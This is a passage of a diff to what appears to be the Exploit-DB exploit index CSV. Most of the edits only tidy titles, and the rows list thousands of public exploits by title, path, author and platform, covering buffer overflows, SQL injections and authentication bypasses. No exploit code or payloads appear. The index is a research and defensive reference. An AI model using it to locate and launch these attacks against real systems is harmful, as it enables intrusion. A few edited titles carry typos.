FORGIT",php,webapps,0 19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection",2012-06-08,"Easy Laster",php,webapps,0 -19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 DEBUG",1988-08-01,anonymous,linux,remote,0 +19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - DEBUG",1988-08-01,anonymous,linux,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x - SQL Injection",2012-06-10,"Easy Laster",php,webapps,0 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 19034,platforms/windows/dos/19034.cpp,"PEamp - (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0 @@ -16445,7 +16441,7 @@ id,file,description,date,author,platform,type,port 19036,platforms/php/webapps/19036.php,"WordPress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,Metasploit,windows,local,0 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload",2012-06-10,Metasploit,php,webapps,0 -19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 +19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc",1990-08-14,"Peter Shipley",solaris,remote,0 19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot",1991-05-01,anonymous,aix,dos,0 19042,platforms/solaris/dos/19042.txt,"SunOS 4.1.1 - /usr/release/bin/makeinstall",1999-11-23,anonymous,solaris,dos,0 @@ -16483,9 +16479,9 @@ id,file,description,date,author,platform,type,port 19077,platforms/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow (1)",1998-05-05,jamez,linux,local,0 19078,platforms/linux/local/19078.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow (2)",1998-05-05,pr10n,linux,local,0 19079,platforms/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Exploit",1998-05-01,"Mark Zielinski",linux,remote,0 -19080,platforms/linux/dos/19080.txt,"Debian suidmanager 0.18",1998-04-28,"Thomas Roessler",linux,dos,0 +19080,platforms/linux/dos/19080.txt,"Debian suidmanager 0.18 - Exploit",1998-04-28,"Thomas Roessler",linux,dos,0 19081,platforms/multiple/remote/19081.txt,"Lynx 2.8 - Buffer Overflow",1998-05-03,"Michal Zalewski",multiple,remote,0 -19082,platforms/linux/dos/19082.txt,"AMD K6 Processor",1998-06-01,Poulot-Cazajous,linux,dos,0 +19082,platforms/linux/dos/19082.txt,"AMD K6 Processor - Exploit",1998-06-01,Poulot-Cazajous,linux,dos,0 19083,platforms/windows/remote/19083.cpp,"Cheyenne Inoculan for Windows NT 4.0 Share",1998-06-10,"Paul Boyer",windows,remote,0 19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1",1998-06-30,"Jeff Forristal",multiple,remote,0 19085,platforms/linux/dos/19085.c,"Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process",1998-06-30,"David Luyer",linux,dos,0 @@ -16493,7 +16489,7 @@ id,file,description,date,author,platform,type,port 19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2 & SCO Open Server 5.0.5 & ProFTPD 1.2 pre1 - realpath (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 19089,platforms/windows/dos/19089.txt,"Windows OpenType Font - File Format Denial of Service",2012-06-12,Cr4sh,windows,dos,0 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Remote Root Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 -19092,platforms/multiple/remote/19092.py,"MySQL Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 +19092,platforms/multiple/remote/19092.py,"MySQL - Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0 19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4.0/5.0 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0 19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 - Path Embedded Code Execution",1999-04-20,Shadow,linux,local,0 @@ -16521,14 +16517,14 @@ id,file,description,date,author,platform,type,port 19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0 19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon",1998-07-06,"RSI Advise",linux,remote,0 19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query",1998-07-06,"Luz Pinto",multiple,remote,0 -19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1",1998-07-08,"Albert Nubdy",multiple,remote,0 +19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Exploit",1998-07-08,"Albert Nubdy",multiple,remote,0 19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group missing results in Root access",1998-07-13,"Richard Thomas",linux,local,0 19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0 19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,linux,remote,0 -19125,platforms/linux/local/19125.txt,"Oracle 8 oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 -19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management",1998-07-16,"Ralf Lehmann",solaris,local,0 +19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 +19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0 19127,platforms/multiple/remote/19127.txt,"Verity Search97 2.1 Security",1998-07-14,"Stefan Arentz",multiple,remote,0 -19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 sdtcm_convert",1998-10-23,UNYUN,solaris,local,0 +19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 sdtcm_convert - Exploit",1998-10-23,UNYUN,solaris,local,0 19129,platforms/multiple/remote/19129.txt,"Microsoft IIS 4.0 / Microsoft Site Server 3.0 - Showcode ASP",1999-05-07,L0pht,multiple,remote,0 19130,platforms/freebsd/local/19130.c,"FreeBSD 3.0 UNIX-domain panic",1999-05-05,"Lukasz Luzar",freebsd,local,0 19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server 5.30 - Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0 @@ -16544,7 +16540,7 @@ id,file,description,date,author,platform,type,port 19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001'",1999-01-07,"Richard M. Smith",windows,local,0 19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 - Backdoor",1999-01-07,"Satu Laksela",windows,local,0 19145,platforms/windows/local/19145.c,"Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,windows,local,0 -19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0",1999-01-03,"Dr. Mudge",linux,local,0 +19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 - Expoit",1999-01-03,"Dr. Mudge",linux,local,0 19147,platforms/windows/remote/19147.txt,"NT IIS4 - Remote Web-Based Administration",1999-01-14,Mnemonix,windows,remote,0 19149,platforms/windows/remote/19149.c,"NT IIS4 Log Avoidance",1999-01-22,Mnemonix,windows,remote,0 19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 - IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,windows,remote,0 @@ -16554,11 +16550,11 @@ id,file,description,date,author,platform,type,port 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM & unix_scheme",1997-02-25,"Cristian Schipor",solaris,local,0 -19159,platforms/solaris/local/19159.c,"Solaris 2.5.1 ffbconfig",1997-02-10,"Cristian Schipor",solaris,local,0 -19160,platforms/solaris/local/19160.c,"Solaris 2.5.1 chkey",1997-05-19,"Adam Morrison",solaris,local,0 -19161,platforms/solaris/local/19161.txt,"Solaris 2.5.1 Ping",1997-06-15,"Adam Caldwell",solaris,local,0 -19402,platforms/hardware/remote/19402.txt,"Root Exploit Western Digital's WD TV Live SMP/Hub",2012-06-26,"Wolfgang Borst",hardware,remote,0 -19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 ioconfig",1998-07-20,Loneguard,irix,local,0 +19159,platforms/solaris/local/19159.c,"Solaris 2.5.1 ffbconfig - Exploit",1997-02-10,"Cristian Schipor",solaris,local,0 +19160,platforms/solaris/local/19160.c,"Solaris 2.5.1 chkey - Exploit",1997-05-19,"Adam Morrison",solaris,local,0 +19161,platforms/solaris/local/19161.txt,"Solaris 2.5.1 Ping - Exploit",1997-06-15,"Adam Caldwell",solaris,local,0 +19402,platforms/hardware/remote/19402.txt,"Western Digital's WD TV Live SMP/Hub - Root Exploit",2012-06-26,"Wolfgang Borst",hardware,remote,0 +19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 ioconfig - Exploit",1998-07-20,Loneguard,irix,local,0 19164,platforms/windows/remote/19164.txt,"Microsoft IE4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0 19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 @@ -16571,9 +16567,9 @@ id,file,description,date,author,platform,type,port 19178,platforms/php/webapps/19178.txt,"webo site speedup 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 19179,platforms/php/webapps/19179.txt,"PHP Decoda 3.3.1 - Local File Inclusion",2012-06-16,"Number 7",php,webapps,0 19180,platforms/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 -19181,platforms/windows/dos/19181.txt,"XnView RAS Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 -19182,platforms/windows/dos/19182.txt,"XnView ECW Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 -19183,platforms/windows/dos/19183.txt,"XnView FlashPix Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 +19181,platforms/windows/dos/19181.txt,"XnView - .RAS Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 +19182,platforms/windows/dos/19182.txt,"XnView - .ECW Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 +19183,platforms/windows/dos/19183.txt,"XnView - .FlashPix Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19184,platforms/windows/dos/19184.pl,"Karafun Player 1.20.86 - (.m3u) Crash PoC",2012-06-16,Styxosaurus,windows,dos,0 19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,hardware,webapps,0 19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption",2012-06-16,Metasploit,windows,remote,0 @@ -16581,21 +16577,21 @@ id,file,description,date,author,platform,type,port 19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,php,webapps,0 19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 -19192,platforms/windows/local/19192.txt,"Hancom Office 2007 Reboot.ini Clear-Text Passwords",1999-02-09,"Russ Cooper",windows,local,0 +19192,platforms/windows/local/19192.txt,"Hancom Office 2007 - Reboot.ini Clear-Text Passwords",1999-02-09,"Russ Cooper",windows,local,0 19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote,0 19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets",1997-07-16,"Paul Ashton",windows,local,0 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0 19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local,0 -19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 automount",1997-11-26,anonymous,solaris,local,0 +19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 automount - Exploit",1997-11-26,anonymous,solaris,local,0 19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library (1)",1997-08-25,bloodmask,unix,local,0 19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library (2)",1997-08-25,jGgM,unix,local,0 19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library (3)",1997-08-25,jGgM,unix,local,0 19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian Linux 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin",1996-12-04,"Roger Espel Llima",unix,local,0 -19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 -19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 -19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 +19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 - EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 +19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo - Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 +19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset - Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 19207,platforms/windows/dos/19207.txt,"Microsoft Outlook Express 4.27.3110/4.72.3120 - POP Denial of Service",1999-05-11,"Miquel van Smoorenburg",windows,dos,0 19208,platforms/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information",1999-05-11,"Andrey Kruchkov",windows,remote,0 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - Help File Buffer Overflow",1999-05-17,"David Litchfield",windows,local,0 @@ -16612,21 +16608,21 @@ id,file,description,date,author,platform,type,port 19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - CFCRYPT.EXE",1998-05-19,"Matt Chapman",windows,local,0 19221,platforms/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Buffer Overflow",1999-05-25,cmart,multiple,remote,0 19222,platforms/multiple/remote/19222.txt,"Gordano NTMail 4.2 Web File Access",1999-05-25,Marc,multiple,remote,0 -19223,platforms/multiple/remote/19223.txt,"Floosietek FTGate 2.1 Web File Access",1999-05-25,Marc,multiple,remote,0 -19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 Web File Access",1999-05-25,Marc,windows,remote,0 +19223,platforms/multiple/remote/19223.txt,"Floosietek FTGate 2.1 - Web File Access",1999-05-25,Marc,multiple,remote,0 +19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 - Web File Access",1999-05-25,Marc,windows,remote,0 19225,platforms/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0 / Insight Management Agents 4.21 A/4.22 A/4.30 A / Intelligent Cluster Administrator 1.0 / Management Agents for Workstations 4.20 A / Server Management Agents 4.23 / Survey Utility 2.0 - Web File Access",1999-05-25,"Master Dogen",multiple,dos,0 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow",1999-05-26,"Chris Evans",linux,remote,0 -19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0",1999-05-10,"Thomas Krug",windows,local,0 +19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Exploit",1999-05-10,"Thomas Krug",windows,local,0 19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine VBA",1999-05-25,"J. Abreu Junior",multiple,dos,0 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",multiple,dos,0 -19231,platforms/windows/remote/19231.rb,"PHP apache_request_headers Function Buffer Overflow",2012-06-17,Metasploit,windows,remote,0 +19231,platforms/windows/remote/19231.rb,"PHP - apache_request_headers Function Buffer Overflow",2012-06-17,Metasploit,windows,remote,0 19232,platforms/solaris/local/19232.txt,"SunOS 4.1.4 - arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 19233,platforms/solaris/local/19233.txt,"Solaris 7.0 aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0 -19234,platforms/solaris/local/19234.c,"Solaris 7.0 cancel",1999-03-05,"Josh A. Strickland",solaris,local,0 -19235,platforms/solaris/local/19235.txt,"Solaris 7.0 chkperm",1996-12-05,"Kevin L Prigge",solaris,local,0 -19236,platforms/solaris/remote/19236.txt,"Solaris 7.0 Coredump",1996-08-03,"Jungseok Roh",solaris,remote,0 -19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 SPAM Relay",1999-06-08,Geo,aix,remote,0 +19234,platforms/solaris/local/19234.c,"Solaris 7.0 cancel - Exploit",1999-03-05,"Josh A. Strickland",solaris,local,0 +19235,platforms/solaris/local/19235.txt,"Solaris 7.0 chkperm - Exploit",1996-12-05,"Kevin L Prigge",solaris,local,0 +19236,platforms/solaris/remote/19236.txt,"Solaris 7.0 Coredump - Exploit",1996-08-03,"Jungseok Roh",solaris,remote,0 +19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 - SPAM Relay",1999-06-08,Geo,aix,remote,0 19238,platforms/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - DoS Duplicate Hostname",1999-06-04,"Carl Byington",windows,dos,0 19239,platforms/windows/remote/19239.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - IIS IDC Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0 @@ -16638,45 +16634,45 @@ id,file,description,date,author,platform,type,port 19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0 19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote,0 -19249,platforms/linux/local/19249.c,"Xcmail 0.99.6",1999-03-02,Arthur,linux,local,0 +19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 - Exploit",1999-03-02,Arthur,linux,local,0 19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs",1999-02-19,"Brian Jones",linux,dos,0 -19251,platforms/linux/remote/19251.c,"tcpdump 3.4 Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0 +19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0 19401,platforms/windows/local/19401.txt,"quicktime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 19253,platforms/linux/remote/19253.txt,"Debian Linux 2.1 - httpd",1999-06-17,anonymous,linux,remote,0 19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 gnuplot",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 No Logging",1999-06-09,"Tani Hosokawa",linux,local,0 19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian Linux 2.0 - netstd",1999-01-03,anonymous,linux,local,0 -19257,platforms/linux/local/19257.c,"X11R6 3.3.3 Symlink",1999-03-21,Stealthf0rk,linux,local,0 -19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core",1999-01-07,"John McDonald",solaris,local,0 -19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc",1999-02-03,xnec,linux,local,0 +19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,linux,local,0 +19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0 +19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploi",1999-02-03,xnec,linux,local,0 19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0 19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 -19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer",1996-11-21,"Yuri Volobuev",irix,local,0 +19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0 19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0 19265,platforms/windows/dos/19265.py,"Total Video Player 1.31 - (.m3u) Crash PoC",2012-06-18,0dem,windows,dos,0 19266,platforms/windows/remote/19266.py,"Ezhometech Ezserver 6.4 - Stack Overflow Exploit",2012-06-18,modpr0be,windows,remote,0 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 -19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin Vulnerabilities",1996-08-06,"Grant Kaufmann",irix,local,0 -19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 colorview",1995-02-09,"Dave Sill",irix,local,0 +19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin - Exploit",1996-08-06,"Grant Kaufmann",irix,local,0 +19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 colorview - Exploit",1995-02-09,"Dave Sill",irix,local,0 19270,platforms/linux/local/19270.c,"Debian Linux 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0 19271,platforms/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port DoS",1999-01-19,"David Schwartz",linux,dos,0 19272,platforms/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot",1999-01-26,"Dan Burcaw",linux,dos,0 19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier",1997-05-16,"Mike Neuman",irix,local,0 -19274,platforms/irix/local/19274.c,"SGI IRIX 6.3 df",1997-05-24,"David Hedley",irix,local,0 +19274,platforms/irix/local/19274.c,"SGI IRIX 6.3 df - Exploit",1997-05-24,"David Hedley",irix,local,0 19275,platforms/irix/local/19275.c,"SGI IRIX 6.4 datman/cdman",1996-12-09,"Yuri Volobuev",irix,local,0 19276,platforms/irix/local/19276.c,"SGI IRIX 6.2 - eject (1)",1997-05-25,DCRH,irix,local,0 19277,platforms/irix/local/19277.c,"SGI IRIX 6.2 - eject (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX 10.20 / IBM AIX 4.1.5 - connect() Denial of Service",1997-03-05,"Cahya Wirawan",hp-ux,dos,0 19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console",1996-02-02,"David J Meltzer",linux,local,0 -19280,platforms/irix/local/19280.txt,"SGI IRIX 6.2 fsdump",1996-12-03,"Jaechul Choe",irix,local,0 -19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview",1999-05-28,"Chris Evans",linux,local,0 +19280,platforms/irix/local/19280.txt,"SGI IRIX 6.2 fsdump - Exploit",1996-12-03,"Jaechul Choe",irix,local,0 +19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview - Exploit",1999-05-28,"Chris Evans",linux,local,0 19282,platforms/linux/dos/19282.c,"Linux Kernel 2.0 Sendmail - Denial of Service",1999-05-28,"Michal Zalewski",linux,dos,0 19283,platforms/linux/local/19283.c,"Slackware Linux 3.1 - Buffer Overflow",1997-03-04,Solar,linux,local,0 19284,platforms/linux/local/19284.c,"Armidale Software Yapp Conferencing System 2.2 - Buffer Overflow",1998-01-20,satan,linux,local,0 19285,platforms/linux/local/19285.txt,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (1)",1997-05-27,zgv,linux,local,0 19286,platforms/linux/local/19286.c,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (2)",1997-05-27,"Solar Designer",linux,local,0 -19287,platforms/aix/local/19287.c,"IBM AIX 4.3 infod",1998-11-21,"Repent Security Inc",aix,local,0 +19287,platforms/aix/local/19287.c,"IBM AIX 4.3 infod - Exploit",1998-11-21,"Repent Security Inc",aix,local,0 19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0 19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - NULL Pointer Deference",2012-06-19,"Luigi Auriemma",windows,dos,0 19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 - Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0 @@ -16688,40 +16684,40 @@ id,file,description,date,author,platform,type,port 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0 -19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin 